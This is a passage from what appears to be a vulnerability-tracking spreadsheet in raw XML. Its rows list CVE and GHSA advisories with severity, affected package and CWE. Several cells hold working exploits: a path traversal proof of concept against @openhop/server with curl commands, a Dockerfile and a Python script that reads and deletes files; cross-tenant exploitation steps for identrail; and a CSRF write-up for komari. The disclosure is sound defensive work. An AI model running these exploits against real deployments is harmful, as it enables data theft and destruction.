                f"컨테이너 종료 코드 {run_result.returncode}. "
                "exploit.mjs 오류 또는 MCP 서버 시작 실패. 로그 확인 필요."
            )
        write_result(False, verdict, reason, combined[-2000:])
        print(f"[poc] === {verdict}: exploit did not reproduce ===")
        sys.exit(1)
if __name__ == "__main__":
    main()
```</t>
        </is>
      </c>
      <c r="S635" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59176</t>
        </is>
      </c>
    </row>
    <row r="636">
      <c r="A636" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B636" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C636" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59177</t>
        </is>
      </c>
      <c r="D636" s="5" t="inlineStr"/>
      <c r="E636" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F636" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G636" s="5" t="inlineStr"/>
      <c r="H636" s="5" t="inlineStr"/>
      <c r="I636" s="5" t="inlineStr"/>
      <c r="J636" s="5" t="inlineStr"/>
      <c r="K636" s="5" t="inlineStr"/>
      <c r="L636" s="5" t="inlineStr">
        <is>
          <t>pip:esphome-device-builder</t>
        </is>
      </c>
      <c r="M636" s="5" t="inlineStr">
        <is>
          <t>1.0.10</t>
        </is>
      </c>
      <c r="N636" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O636" s="5" t="inlineStr"/>
      <c r="P636" s="5" t="inlineStr"/>
      <c r="Q636" s="5" t="inlineStr">
        <is>
          <t>CWE-1327</t>
        </is>
      </c>
      <c r="R636"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S636" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59177</t>
        </is>
      </c>
    </row>
    <row r="637">
      <c r="A637" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B637" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C637" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59179</t>
        </is>
      </c>
      <c r="D637" s="5" t="inlineStr"/>
      <c r="E637" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F637" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G637" s="5" t="inlineStr"/>
      <c r="H637" s="5" t="inlineStr"/>
      <c r="I637" s="5" t="inlineStr"/>
      <c r="J637" s="5" t="inlineStr"/>
      <c r="K637" s="5" t="inlineStr"/>
      <c r="L637" s="5" t="inlineStr">
        <is>
          <t>npm:@openhop/server</t>
        </is>
      </c>
      <c r="M637" s="5" t="inlineStr">
        <is>
          <t>0.3.6</t>
        </is>
      </c>
      <c r="N637" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O637" s="5" t="inlineStr"/>
      <c r="P637" s="5" t="inlineStr"/>
      <c r="Q637" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R637" s="5" t="inlineStr">
        <is>
          <t>## Path Traversal in Flow ID File Operations
### Summary
`@openhop/server` passes unsanitized HTTP route parameters directly to `path.join()` when constructing filesystem paths for flow YAML files. An unauthenticated attacker who can reach the server can read arbitrary `.yaml` files accessible to the OpenHop process outside the configured flow directory, and can delete arbitrary `.yaml` files at any path reachable by the process. Because CORS is set to `origin: true` (allow all origins), a victim's browser can be used to exploit the vulnerability against a loopback-bound instance. Docker deployments bind `HOST=0.0.0.0` by default, enabling direct remote exploitation. CVSS Base Score: **8.3 (High)**.
### Details
`FlowStore.filePath()` in `packages/server/src/store.ts:52–53` constructs a filesystem path by concatenating the caller-supplied `id` directly into `path.join`:
```ts
// packages/server/src/store.ts:52-53
private filePath(id: string): string {
  return join(this.dir, `${id}.yaml`)
}
```
This result is consumed by two sinks:
- **Read** (`packages/server/src/store.ts:78`): `readFile(this.filePath(id), 'utf-8')`
- **Delete** (`packages/server/src/store.ts:105`): `unlink(this.filePath(id))`
The `id` value originates from unauthenticated Fastify HTTP route parameters:
- `GET /api/flows/:id` (`packages/server/src/routes.ts:306`) → `store.get(id)` at line 333–335
- `DELETE /api/flows/:id` (`packages/server/src/routes.ts:509`) → `store.delete(id)` at line 539–541
The route parameter schema at `packages/server/src/routes.ts:315` and `519` declares only `type: 'string'` with no pattern constraint or allowlist. Fastify's underlying router (`find-my-way`) applies `decodeURIComponent` to route parameters, so the URL segment `..%2Fvictim` is decoded to `../victim` before it reaches application code. Node.js `path.join('/data/flows', '../victim.yaml')` then normalizes to `/data/victim.yaml`, escaping the configured data directory.
Additionally, `packages/server/src/index.ts:37` registers CORS with `origin: true`, permitting any browser origin to make cross-origin requests to the server. This makes the vulnerability exploitable via a malicious webpage against users running OpenHop locally.
**Full data-flow (read path):**
1. HTTP `GET /api/flows/..%2Fvictim` received (`routes.ts:306`)
2. `find-my-way` decodes `..%2Fvictim` → `req.params.id = '../victim'` (`routes.ts:333`)
3. `store.get('../victim')` → `filePath('../victim')` → `join('/data/flows', '../victim.yaml')` → `/data/victim.yaml` (`store.ts:52–53`)
4. `readFile('/data/victim.yaml', 'utf-8')` returns file contents (`store.ts:78`)
5. Server responds HTTP 200 with YAML-parsed JSON body
**Full data-flow (delete path):**
1. HTTP `DELETE /api/flows/..%2Fdelete-me` received (`routes.ts:509`)
2. `find-my-way` decodes `..%2Fdelete-me` → `req.params.id = '../delete-me'` (`routes.ts:539`)
3. `store.delete('../delete-me')` → `filePath('../delete-me')` → `join('/data/flows', '../delete-me.yaml')` → `/data/delete-me.yaml` (`store.ts:52–53`)
4. `unlink('/data/delete-me.yaml')` removes the file (`store.ts:105`)
5. Server responds HTTP 204
### PoC
**Environment setup (Docker):**
```bash
# Build from repository root
docker build -f vuln-001/Dockerfile -t openhop-vuln-001 .
# Run with HOST=0.0.0.0 (default in the Dockerfile ENV)
docker run -d --name openhop-vuln-001 -p 8799:8799 openhop-vuln-001
```
The container creates `/data/flows/` as the configured flow store (`OPENHOP_DATA_DIR=/data/flows`) and places `/data/victim.yaml` and `/data/delete-me.yaml` outside that directory as traversal targets.
**Attack 1 — Read file outside flow store:**
```bash
curl -i --path-as-is 'http://127.0.0.1:8799/api/flows/..%2Fvictim'
```
Expected response:
```http
HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
{"id":"victim","meta":{"title":"SECRET_OUTSIDE_FILE","description":"This file lives outside the configured flow store directory"},"flow":{"nodes":[{"id":"a","label":"Sensitive Data","type":"service"}]},"version":1,"createdAt":"2026-06-20T00:00:00.000Z","updatedAt":"2026-06-20T00:00:00.000Z"}
```
**Attack 2 — Delete file outside flow store:**
```bash
curl -i -X DELETE --path-as-is 'http://127.0.0.1:8799/api/flows/..%2Fdelete-me'
```
Expected response:
```http
HTTP/1.1 204 No Content
```
Verify deletion:
```bash
docker exec openhop-vuln-001 sh -c 'test -e /data/delete-me.yaml &amp;&amp; echo exists || echo deleted'
# Output: deleted
```
**Automated PoC script:**
```bash
python3 poc.py 127.0.0.1 8799
```
**Recommended fix:**
```diff
--- a/packages/server/src/store.ts
+++ b/packages/server/src/store.ts
+const FLOW_ID_PATTERN = /^[A-Za-z0-9_-]+$/
+
   private filePath(id: string): string {
+    if (!FLOW_ID_PATTERN.test(id)) {
+      throw new Error('Invalid flow id')
+    }
     return join(this.dir, `${id}.yaml`)
   }
```
### Impact
This is a **Path Traversal (CWE-22)** vulnerability. The `.yaml` file extension restriction limits confidentiality impact to YAML-format files (C:L), but the delete path allows permanent destruction of any `.yaml` file the process can reach (I:H, A:H).
**Affected parties:**
- **Users running `openhop serve` locally** — exploitable via a malicious webpage due to `cors({ origin: true })` allowing all browser origins to make cross-origin requests to `localhost:8799`.
- **Docker/server deployments** — `HOST=0.0.0.0` is set by default in the official Docker environment, making all three routes directly reachable from the network without authentication.
An attacker can: (1) read the contents of any `.yaml` file accessible to the OpenHop process, potentially leaking application secrets, configuration data, or other YAML-serialized data; (2) permanently delete any `.yaml` file accessible to the process, causing data loss or disruption of services that depend on those files.
### Reproduction artifacts
#### `Dockerfile`
```dockerfile
# Dockerfile for VULN-001: Path Traversal in OpenHop Flow ID File Operations (CWE-22)
#
# Build context: the repository root (naorsabag/openhop)
# Usage:
#   docker build -f vuln-001/Dockerfile -t openhop-vuln-001 .
#   docker run -d --name openhop-vuln-001 -p 8799:8799 openhop-vuln-001
#
# Data layout inside the container:
#   /data/flows/         &lt;- OPENHOP_DATA_DIR (the configured flow store)
#   /data/victim.yaml    &lt;- OUTSIDE the flow store (path traversal read target)
#   /data/delete-me.yaml &lt;- OUTSIDE the flow store (path traversal delete target)
#
# The exploit payload "..%2Fvictim" is URL-decoded by find-my-way to "../victim",
# so path.join('/data/flows', '../victim.yaml') resolves to /data/victim.yaml.
FROM node:22-alpine
WORKDIR /app
# Copy package manifests so npm can resolve workspace dependency graph.
COPY package*.json ./
COPY packages/server/package*.json packages/server/
COPY packages/shared/package*.json packages/shared/
COPY packages/cli/package*.json packages/cli/
COPY packages/web/package*.json packages/web/
# Copy TypeScript configs and source files BEFORE npm install.
# The @openhop/server package has a "prepare" lifecycle that runs
# `tsc &amp;&amp; esbuild` during npm install, so all sources must be present.
COPY tsconfig.base.json ./
COPY packages/server/tsconfig*.json packages/server/
COPY packages/server/src/ packages/server/src/
COPY packages/shared/src/ packages/shared/src/
# Install all workspace dependencies.
# The @openhop/server prepare script will compile to dist/server.js.
# We run the server via tsx (direct TypeScript), so the compiled output
# is not required at runtime but the prepare step must not fail.
RUN npm install
# Set up the data directory layout for the PoC.
#   /data/flows/       -&gt; configured as OPENHOP_DATA_DIR (the "safe" directory)
#   /data/victim.yaml  -&gt; outside the store; represents a sensitive file that
#                         MUST NOT be reachable via the API without sanitization
RUN mkdir -p /data/flows &amp;&amp; \
    printf 'id: victim\nversion: 1\ncreatedAt: "2026-06-20T00:00:00.000Z"\nupdatedAt: "2026-06-20T00:00:00.000Z"\nroot:\n  meta:\n    title: SECRET_OUTSIDE_FILE\n    description: This file lives outside the configured flow store directory\n  flow:\n    nodes:\n      - id: a\n        label: Sensitive Data\n' \
    &gt; /data/victim.yaml &amp;&amp; \
    printf 'id: delete-me\nversion: 1\ncreatedAt: "2026-06-20T00:00:00.000Z"\nupdatedAt: "2026-06-20T00:00:00.000Z"\nroot:\n  meta:\n    title: DELETE_TARGET_FILE\n  flow:\n    nodes:\n      - id: b\n        label: Delete Target\n' \
    &gt; /data/delete-me.yaml
# Server listens on 8799 inside the container.
EXPOSE 8799
# OPENHOP_DATA_DIR constrains the flow store to /data/flows/.
# HOST=0.0.0.0 makes the server reachable from outside the container.
ENV OPENHOP_DATA_DIR=/data/flows
ENV HOST=0.0.0.0
ENV PORT=8799
# Run the server via tsx (TypeScript runner; no compile step needed at runtime).
CMD ["npx", "tsx", "packages/server/src/index.ts"]
```
#### `poc.py`
```python
#!/usr/bin/env python3
"""
PoC: Path Traversal in OpenHop Flow ID File Operations (CWE-22)
Target: @openhop/server 0.3.5 / openhop CLI 0.3.6
VULN-001 — CVSS 8.3 High
Vulnerability:
    FlowStore.filePath(id) at packages/server/src/store.ts:52 performs:
        return join(this.dir, `${id}.yaml`)
    with no sanitization on `id`. The route GET /api/flows/:id passes
    `req.params.id` (decoded by find-my-way via decodeURIComponent) directly
    to store.get(id), which calls filePath(). A payload of "..%2Fvictim" in
    the URL is decoded to "../victim", causing path.join to escape the
    configured data directory.
Attack Vectors:
    READ:   GET    /api/flows/..%2Fvictim    -&gt; reads  /data/victim.yaml
    DELETE: DELETE /api/flows/..%2Fdelete-me -&gt; deletes /data/delete-me.yaml
Both routes are unauthenticated (routes.ts:306, 509).
Usage:
    python3 poc.py [host] [port]
    python3 poc.py 127.0.0.1 8799
"""
import http.client
import json
import sys
import time
HOST = sys.argv[1] if len(sys.argv) &gt; 1 else "127.0.0.1"
PORT = int(sys.argv[2]) if len(sys.argv) &gt; 2 else 8799
# URL-encoded payloads: %2F is a percent-encoded "/" character.
# find-my-way treats ".." and "%2F" together as a single path segment
# (no literal "/" split), then decodes the segment to "../victim".
TRAVERSAL_GET_PATH = "/api/flows/..%2Fvictim"
TRAVERSAL_DELETE_PATH = "/api/flows/..%2Fdelete-me"
def wait_for_server(host: str, port: int, timeout: int = 60) -&gt; bool:
    """Poll until the OpenHop server returns any response on /api/flows."""
    deadline = time.time() + timeout
    print(f"[*] Waiting for server at http://{host}:{port} ...")
    while time.time() &lt; deadline:
        try:
            conn = http.client.HTTPConnection(host, port, timeout=2)
            conn.request("GET", "/api/flows")
            r = conn.getresponse()
            r.read()
            conn.close()
            print(f"[+] Server ready (HTTP {r.status} on /api/flows)")
            return True
        except Exception:
            time.sleep(1)
    return False
def raw_http(method: str, host: str, port: int, path: str):
    """
    Send an HTTP request with the path exactly as given — no normalization.
    http.client does NOT percent-decode or normalize the path string, so
    '..%2F' reaches the server verbatim and Fastify's router decodes it.
    """
    conn = http.client.HTTPConnection(host, port, timeout=10)
    conn.request(method, path)
    resp = conn.getresponse()
    body = resp.read()
    conn.close()
    return resp.status, body
def main() -&gt; int:
    print("=" * 62)
    print("VULN-001  Path Traversal in OpenHop Flow ID File Operations")
    print("=" * 62)
    print(f"[*] Target  : http://{HOST}:{PORT}")
    print(f"[*] Payload : ..%2F  (decoded by find-my-way to ../)")
    print(f"[*] Store   : /data/flows/   (OPENHOP_DATA_DIR)")
    print(f"[*] Outside : /data/victim.yaml  /data/delete-me.yaml")
    print()
    if not wait_for_server(HOST, PORT):
        print("[-] Server did not become ready within timeout. ABORT.")
        return 1
    print()
    passed_read = False
    passed_delete = False
    # ── Attack 1: Read a file outside the configured flow store ─────────
    print("[*] Attack 1 — READ path traversal")
    print(f"    Request : GET {TRAVERSAL_GET_PATH}")
    print(f"    Decoded : id = ../victim")
    print(f"    Resolves: path.join('/data/flows', '../victim.yaml')")
    print(f"            = /data/victim.yaml  (outside flow store)")
    status, body = raw_http("GET", HOST, PORT, TRAVERSAL_GET_PATH)
    body_text = body.decode("utf-8", errors="replace")
    print(f"    Status  : {status}")
    print(f"    Body    : {body_text[:600]}")
    if status == 200:
        try:
            data = json.loads(body_text)
            title = data.get("meta", {}).get("title", "")
            if "SECRET_OUTSIDE_FILE" in title:
                print("[PASS] READ confirmed: HTTP 200 returned content of /data/victim.yaml")
                print(f"       Leaked title field = {title!r}")
                passed_read = True
            else:
                print(f"[WARN] HTTP 200 but unexpected title: {title!r}")
                print(f"       Full response: {data}")
                # Still count as read-traversal success if we got a valid flow back
                if "meta" in data or "flow" in data:
                    print("[PASS] READ confirmed: path traversal returned a flow from outside store")
                    passed_read = True
        except json.JSONDecodeError:
            print(f"[FAIL] HTTP 200 but response is not JSON: {body_text[:200]}")
    else:
        print(f"[FAIL] Expected HTTP 200, got {status}")
    print()
    # ── Attack 2: Delete a file outside the configured flow store ────────
    print("[*] Attack 2 — DELETE path traversal")
    print(f"    Request : DELETE {TRAVERSAL_DELETE_PATH}")
    print(f"    Decoded : id = ../delete-me")
    print(f"    Resolves: path.join('/data/flows', '../delete-me.yaml')")
    print(f"            = /data/delete-me.yaml  (outside flow store)")
    status, body = raw_http("DELETE", HOST, PORT, TRAVERSAL_DELETE_PATH)
    body_text = body.decode("utf-8", errors="replace")
    print(f"    Status  : {status}")
    if body_text:
        print(f"    Body    : {body_text[:200]}")
    if status in (200, 204):
        print(f"[PASS] DELETE confirmed: HTTP {status} — /data/delete-me.yaml deleted outside store")
        passed_delete = True
    else:
        print(f"[FAIL] Expected HTTP 204, got {status}")
    # ── Summary ─────────────────────────────────────────────────────────
    print()
    print("=" * 62)
    if passed_read and passed_delete:
        print("[RESULT] PASS — Both read and delete path traversal exploited")
        return 0
    elif passed_read:
        print("[RESULT] PARTIAL — Read traversal confirmed, delete did not succeed")
        return 1
    else:
        print("[RESULT] FAIL — Exploit did not succeed")
        return 2
if __name__ == "__main__":
    sys.exit(main())
```</t>
        </is>
      </c>
      <c r="S637" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59179</t>
        </is>
      </c>
    </row>
    <row r="638">
      <c r="A638" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B638" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C638" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59185</t>
        </is>
      </c>
      <c r="D638" s="5" t="inlineStr"/>
      <c r="E638" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F638" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G638" s="5" t="inlineStr"/>
      <c r="H638" s="5" t="inlineStr"/>
      <c r="I638" s="5" t="inlineStr"/>
      <c r="J638" s="5" t="inlineStr"/>
      <c r="K638" s="5" t="inlineStr"/>
      <c r="L638" s="5" t="inlineStr">
        <is>
          <t>go:github.com/identrail/identrail</t>
        </is>
      </c>
      <c r="M638" s="5" t="inlineStr">
        <is>
          <t>1.0.2</t>
        </is>
      </c>
      <c r="N638" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O638" s="5" t="inlineStr"/>
      <c r="P638" s="5" t="inlineStr"/>
      <c r="Q638" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-862</t>
        </is>
      </c>
      <c r="R638" s="5" t="inlineStr">
        <is>
          <t>## Summary
identrail's GitHub App connection-completion endpoint binds a fully client-supplied `installation_id` to the caller's workspace without verifying that the installation belongs to, or was installed by, the workspace that initiated the connect flow. identrail then mints a GitHub App installation access token for the supplied `installation_id` using the app's own JWT, so an authenticated tenant can link any other identrail customer's GitHub App installation into their own workspace and read that victim organization's private repositories.
## Affected code (default-on path, no feature flag)
- Route: `internal/api/router.go:3590` — `POST /v1/workspaces/:workspace_id/projects/:project_id/github/connect/complete`. `installation_id` is read from the JSON body or the attacker-controlled `X-GitHub-Installation-ID` header (`router.go:3582-3588`).
- Service: `internal/api/github_connect.go:781` `CompleteGitHubConnection`. The `state` token IS rigorously bound to the caller's scope (`github_connect.go:818`: `if stateRecord.TenantID != scope.TenantID || stateRecord.WorkspaceID != project.WorkspaceID || stateRecord.ProjectID != project.ProjectID { ... }`), but the only check on `installation_id` is `request.InstallationID &lt;= 0` (`:794`). The raw client value is persisted as the workspace's connection (`:840`).
- Cross-tenant read primitive: `internal/connectors/github/repositories.go:39` `ListInstallationRepositories` → `internal/connectors/github/app.go:170` mints a token via `POST /app/installations/{installationId}/access_tokens` signed with the App JWT, succeeding for any installation where identrail's app is installed.
The feature-flagged V2 path `CompleteGitHubConnector` (`github_connect.go:447`, default off) shares the gap and is additionally weaker (matches pending connector by `state` value alone with no caller-scope re-check); a single fix should cover both.
## Intent proof
The code binds `state` to `{TenantID, WorkspaceID, ProjectID}` and re-verifies it at completion (`:818`), demonstrating it understands binding is required. The asymmetry — `state` bound, `installation_id` unbound — is the missed check.
## Exploitation
1. Attacker is any authenticated identrail tenant; they call `StartGitHubConnection` for their own workspace and receive a `state`.
2. Attacker calls the completion route with `{state: &lt;their state&gt;, installation_id: V}` where V is a victim org's identrail GitHub App installation id (installation ids are not secret — they appear in post-install redirect URLs, webhook payloads, the org's GitHub App settings, and are enumerable integers).
3. `CompleteGitHubConnection` accepts (state matches attacker scope), `ListInstallationRepositories(V)` mints a token for V and lists the victim org's private repos, and the connection is persisted under the attacker's workspace.
4. Attacker now reads the victim org's private repository inventory and can drive posture scans/repo reads via their own workspace.
Impact: cross-tenant disclosure of another customer organization's private GitHub repositories and metadata.
## Remediation
Bind `installation_id` with the same rigor as `state`: capture it from GitHub's signed post-install redirect (`setup_url`/`callback_url`) and pin it to the pending state at start time, and/or after minting verify the installation's `account` matches the org the initiating workspace is authorized for.</t>
        </is>
      </c>
      <c r="S638" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59185</t>
        </is>
      </c>
    </row>
    <row r="639">
      <c r="A639" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B639" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C639" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69439</t>
        </is>
      </c>
      <c r="D639" s="5" t="inlineStr"/>
      <c r="E639" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F639" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G639" s="5" t="inlineStr"/>
      <c r="H639" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I639" s="5" t="inlineStr"/>
      <c r="J639" s="5" t="inlineStr"/>
      <c r="K639" s="5" t="inlineStr"/>
      <c r="L639" s="5" t="inlineStr">
        <is>
          <t>nuget:Microsoft.DiaSymReader.Native</t>
        </is>
      </c>
      <c r="M639" s="5" t="inlineStr">
        <is>
          <t>18.9.0-beta1.26405.2</t>
        </is>
      </c>
      <c r="N639" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O639" s="5" t="inlineStr"/>
      <c r="P639" s="5" t="inlineStr"/>
      <c r="Q639" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R639" s="5" t="inlineStr">
        <is>
          <t># Microsoft Security Advisory CVE-2026-69439 – .NET and Visual Studio Elevation of Privilege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parsing a Portable PDB file.
## Announcement
Announcement for this issue can be found at https://github.com/dotnet/announcements/issues/438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[CVE-2026-69439](https://www.cve.org/CVERecord?id=CVE-2026-69439)
### Acknowledgements
41ae55e9310ff27fa6f26af4727e5590
### Revisions
V1.0 (09/08/2026): Advisory published.</t>
        </is>
      </c>
      <c r="S639" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69439</t>
        </is>
      </c>
    </row>
    <row r="640">
      <c r="A640" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B640" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C640" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69522</t>
        </is>
      </c>
      <c r="D640" s="5" t="inlineStr"/>
      <c r="E640" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F640" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G640" s="5" t="inlineStr"/>
      <c r="H640" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I640" s="5" t="inlineStr"/>
      <c r="J640" s="5" t="inlineStr"/>
      <c r="K640" s="5" t="inlineStr"/>
      <c r="L640" s="5" t="inlineStr">
        <is>
          <t>nuget:Microsoft.DiaSymReader.Native</t>
        </is>
      </c>
      <c r="M640" s="5" t="inlineStr">
        <is>
          <t>18.9.0-beta1.26405.2</t>
        </is>
      </c>
      <c r="N640" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O640" s="5" t="inlineStr"/>
      <c r="P640" s="5" t="inlineStr"/>
      <c r="Q640" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R640" s="5" t="inlineStr">
        <is>
          <t># Microsoft Security Advisory CVE-2026-69522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processing PDB files.
## Announcement
Announcement for this issue can be found at https://github.com/dotnet/announcements/issues/439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Supported .NET Framework versions listed in the [Microsoft Security Update Guide](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-69522) are also affected. Install the September 2026 .NET Framework security update applicable to a project's Windows version.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.NET Framework users must install the September 2026 security update applicable to their Windows version.
2. If a developer's application references Microsoft.DiaSymReader.Native, update the package reference to version 18.9.0-beta1.26405.2 or later.
Once users have installed the updated runtime, SDK, Visual Studio, or package, they should restart their apps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[CVE-2026-69522](https://www.cve.org/CVERecord?id=CVE-2026-69522)
### Acknowledgements
41ae55e9310ff27fa6f26af4727e5590
### Revisions
V1.0 (09/08/2026): Advisory published.</t>
        </is>
      </c>
      <c r="S640" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69522</t>
        </is>
      </c>
    </row>
    <row r="641">
      <c r="A641" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B641" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C641" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71328</t>
        </is>
      </c>
      <c r="D641" s="5" t="inlineStr"/>
      <c r="E641" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F641" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G641" s="5" t="inlineStr"/>
      <c r="H641" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I641" s="5" t="inlineStr"/>
      <c r="J641" s="5" t="inlineStr"/>
      <c r="K641" s="5" t="inlineStr"/>
      <c r="L641" s="5" t="inlineStr">
        <is>
          <t>nuget:Microsoft.DiaSymReader.Native</t>
        </is>
      </c>
      <c r="M641" s="5" t="inlineStr">
        <is>
          <t>18.9.0-beta1.26405.2</t>
        </is>
      </c>
      <c r="N641" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O641" s="5" t="inlineStr"/>
      <c r="P641" s="5" t="inlineStr"/>
      <c r="Q641" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R641" s="5" t="inlineStr">
        <is>
          <t># Microsoft Security Advisory CVE-2026-71328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Microsoft.DiaSymReader.Native can perform an out of bounds write while processing MSFZ PDB files.
## Announcement
Announcement for this issue can be found at https://github.com/dotnet/announcements/issues/440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[CVE-2026-71328](https://www.cve.org/CVERecord?id=CVE-2026-71328)
### Acknowledgements
41ae55e9310ff27fa6f26af4727e5590
### Revisions
V1.0 (09/08/2026): Advisory published.</t>
        </is>
      </c>
      <c r="S641" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71328</t>
        </is>
      </c>
    </row>
    <row r="642">
      <c r="A642" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B642" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C642" s="5" t="inlineStr">
        <is>
          <t>GHSA-hxjg-93wc-h8p8</t>
        </is>
      </c>
      <c r="D642" s="5" t="inlineStr"/>
      <c r="E642" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F642" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G642" s="5" t="inlineStr"/>
      <c r="H642" s="5" t="inlineStr"/>
      <c r="I642" s="5" t="inlineStr"/>
      <c r="J642" s="5" t="inlineStr"/>
      <c r="K642" s="5" t="inlineStr"/>
      <c r="L642" s="5" t="inlineStr">
        <is>
          <t>go:github.com/komari-monitor/komari</t>
        </is>
      </c>
      <c r="M642" s="5" t="inlineStr">
        <is>
          <t>0.0.0-20260609084633-98122fa4d110</t>
        </is>
      </c>
      <c r="N642" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O642" s="5" t="inlineStr"/>
      <c r="P642" s="5" t="inlineStr"/>
      <c r="Q642" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R642" s="5" t="inlineStr">
        <is>
          <t># Vulnerability Overview
The `session_token` cookie is set **without** the `SameSite` or `Secure` attributes (`login.go:68`).
All `/api/admin/` management endpoints rely solely on this cookie for authentication, with **no CSRF token or Origin validation**.
**The server-side vulnerability is confirmed to exist; however, exploitation via cross-site requests is mitigated in modern browsers by the default `SameSite=Lax` behavior.**
## Root Cause
```go
// komari-main/api/public/login.go:68
c.SetCookie("session_token", session, 2592000, "/", "", false, true)
//   Secure=false, SameSite not explicitly set
//   Admin route group (server.go:213-343) has no CSRF middleware
```
Gin's `ShouldBindJSON` does not strictly validate the `Content-Type` header, allowing `text/plain` requests to bypass CORS preflight.
## Browser Limitations
- Chrome 80+ (Feb 2020), Firefox 103+ (Jul 2022), and Safari all default unspecified cookies to `SameSite=Lax`.
- Cookies without an explicit `SameSite` attribute **are not included in cross-site POST requests**.
- As a result, the server receives requests without the session cookie and returns **HTTP 401 Unauthorized**.
| Scenario | Exploitable |
|----------|-------------|
| Cross-site HTML (modern browsers) | ✗ Blocked by `SameSite=Lax` |
| Cross-site HTML (Chrome &lt;80 / legacy browsers) | ✓ |
| Same-origin context (Browser Console / existing XSS) | ✓ |
| Man-in-the-middle over HTTP (`Secure=false`) | ✓ |
## High-Impact Operations Reachable via CSRF
| Endpoint | Method | Impact |
|----------|--------|--------|
| `/api/admin/task/exec` | POST | Execute arbitrary shell commands on managed nodes |
| `/api/admin/2fa/disable` | POST | Disable administrator two-factor authentication |
| `/api/admin/settings/` | POST | Modify system configuration |
| `/api/admin/upload/backup` | POST | Upload a malicious backup |
| `/api/admin/record/clear/all` | POST | Delete all monitoring records |
| `/api/admin/client/:uuid/edit` | POST | Modify client configuration |
| `/api/admin/client/:uuid/remove` | POST | Remove managed clients |
| `/api/admin/session/remove/all` | POST | Invalidate all active sessions |
| `/api/admin/settings/cloudflared/start` | POST | Start a Cloudflared tunnel |
## PoC 1 — Disable 2FA
